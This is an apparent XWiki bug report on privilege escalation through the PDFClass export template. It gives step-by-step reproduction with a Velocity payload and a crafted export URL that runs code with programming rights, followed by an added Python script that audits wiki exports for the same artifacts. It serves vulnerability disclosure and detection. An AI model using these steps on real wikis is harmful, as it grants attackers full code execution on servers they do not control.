XWiki Platform: XWIKI-21337

Privilege escalation (PR) from user registration through PDFClass

    Description

      Steps to reproduce:

      1. Register a new user account with username PDFClass.
      2. Switch your user account to advanced.
      3. Use the class editor on the user profile and create a new "TextArea" property with name "style". Set the content type to "Plain Text".
      4. Use the object editor on the user profile and add a new object of PDFClass. Set the "style" attribute to $services.logging.getLogger('PDFClass').error("I got programming: $services.security.authorization.hasAccess('programming')").
      5. Open <xwiki-server>/xwiki/bin/export/Main/WebHome?format=pdf&pdfcover=1&pdfcover=0&pdftoc=1&pdftoc=0&pdfheader=1&pdfheader=0&pdffooter=1&pdffooter=0&comments=0&attachments=0&pdftemplate=XWiki.PDFClass where <xwiki-server> is the URL of your XWiki installation.

      Expected result:

      No error is logged.

      Actual result:

      An error message

      2023-09-21 10:38:47,090 [qtp2005169944-130 - http://localhost:8080/xwiki/bin/export/Main/WebHome?format=pdf&pdfcover=1&pdfcover=0&pdftoc=1&pdftoc=0&pdfheader=1&pdfheader=0&pdffooter=1&pdffooter=0&comments=0&attachments=0&pdftemplate=XWiki.PDFClass] ERROR PDFClass                       - I got programming: true

      is logged, showing that we have executed Velocity code with programming rights.

      I put 14.10 as affects version but I'm sure the vulnerability is older.

      The demonstrated attack only works when user registration is enabled. When user registration is disabled, the attack could still work but in this case it is necessary that the PDFClass has already been created by an admin (to customize PDF or office export as documented). In this case, start at step 3 and adjust the export URL accordingly to reference the page where you created the object.
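      For administrators who want to check an existing wiki for the artifacts this report describes, the following audit script is an added example; it is not part of the report and not XWiki project code. It walks XWiki document XML exports (the element layout used here, `<xwikidoc>` with `<author>`, `<class>` and `<object>`/`<className>`/`<property>` children, is an assumption approximating XWiki's export format) and raises two kinds of finding: the page `XWiki.PDFClass` being a user profile (the registration trick from step 1, recognised by the presence of an `XWiki.XWikiUsers` object), and any `XWiki.PDFClass` object whose properties contain Velocity syntax, together with the document author who would get the code evaluated. The sample documents and the Velocity-detection heuristic are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

PDFCLASS_NAME = "XWiki.PDFClass"
USERS_CLASS_NAME = "XWiki.XWikiUsers"

# Conservative heuristic (assumption): a '$' reference or one of the common '#'
# directives. Plain CSS such as "#header { ... }" is deliberately not matched.
VELOCITY_RE = re.compile(
    r"\$!?\{?[A-Za-z_]"
    r"|#\{?(?:if|set|foreach|include|parse|evaluate|macro|define|end|else|elseif|break|stop)\b"
)


@dataclass
class Finding:
    kind: str            # "pdfclass-page-is-user-profile" or "velocity-in-property"
    page: str            # document reference, e.g. XWiki.PDFClass
    author: str          # document author whose rights the Velocity would run with
    property_name: str   # PDFClass property holding the suspicious value ("" for check 1)
    snippet: str         # first characters of the value, for the report


# Constructed sample documents in an assumed XWiki-export-like layout.
SAMPLE_DOCS = {
    # A registered user named "PDFClass": the profile page XWiki.PDFClass carries an
    # XWiki.XWikiUsers object, a local class definition and a PDFClass object whose
    # "style" property holds the Velocity payload from the report.
    "user-profile": """<xwikidoc reference="XWiki.PDFClass">
  <web>XWiki</web>
  <name>PDFClass</name>
  <author>XWiki.PDFClass</author>
  <class>
    <name>XWiki.PDFClass</name>
    <style>
      <name>style</name>
      <contenttype>PureText</contenttype>
      <classType>com.xpn.xwiki.objects.classes.TextAreaClass</classType>
    </style>
  </class>
  <object>
    <className>XWiki.XWikiUsers</className>
    <property><first_name>PDF</first_name></property>
  </object>
  <object>
    <className>XWiki.PDFClass</className>
    <property>
      <style>$services.logging.getLogger('PDFClass').error("got PR: $services.security.authorization.hasAccess('programming')")</style>
    </property>
  </object>
</xwikidoc>""",
    # A legitimate, admin-created PDF template: plain CSS only, so no finding.
    "admin-template": """<xwikidoc reference="XWiki.PDFClass">
  <web>XWiki</web>
  <name>PDFClass</name>
  <author>XWiki.Admin</author>
  <object>
    <className>XWiki.PDFClass</className>
    <property>
      <style>body { font-family: serif; } #header { display: none; }</style>
    </property>
  </object>
</xwikidoc>""",
}


def audit_document(xml_text: str) -> list:
    """Return the findings for one exported document."""
    root = ET.fromstring(xml_text)
    page = root.get("reference") or f"{root.findtext('web')}.{root.findtext('name')}"
    author = root.findtext("author") or "<unknown>"
    objects = root.findall("object")
    classes = {obj.findtext("className") for obj in objects}
    findings = []

    # Check 1: the PDF template page is actually a user profile (registration trick).
    if page == PDFCLASS_NAME and USERS_CLASS_NAME in classes:
        findings.append(Finding("pdfclass-page-is-user-profile", page, author, "", ""))

    # Check 2: any PDFClass object property that contains Velocity syntax.
    for obj in objects:
        if obj.findtext("className") != PDFCLASS_NAME:
            continue
        for prop in obj.findall("property"):
            for field in prop:  # each child element is one named property
                value = (field.text or "").strip()
                if VELOCITY_RE.search(value):
                    findings.append(Finding("velocity-in-property", page, author,
                                            field.tag, value[:60]))
    return findings


def audit_all(docs: dict) -> list:
    """Audit a mapping of export name -> document XML and collect all findings."""
    findings = []
    for xml_text in docs.values():
        findings.extend(audit_document(xml_text))
    return findings


if __name__ == "__main__":
    for f in audit_all(SAMPLE_DOCS):
        print(f"{f.kind}: page={f.page} author={f.author} "
              f"property={f.property_name or '-'} value={f.snippet!r}")
```

      In a real run the `SAMPLE_DOCS` mapping would be replaced by the XML files of an XAR export (or documents fetched through the REST API), and any `velocity-in-property` finding whose author is not a trusted administrator is what an operator would want to review.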

      People

        pjeanjean Pierre Jeanjean
        MichaelHamann Michael Hamann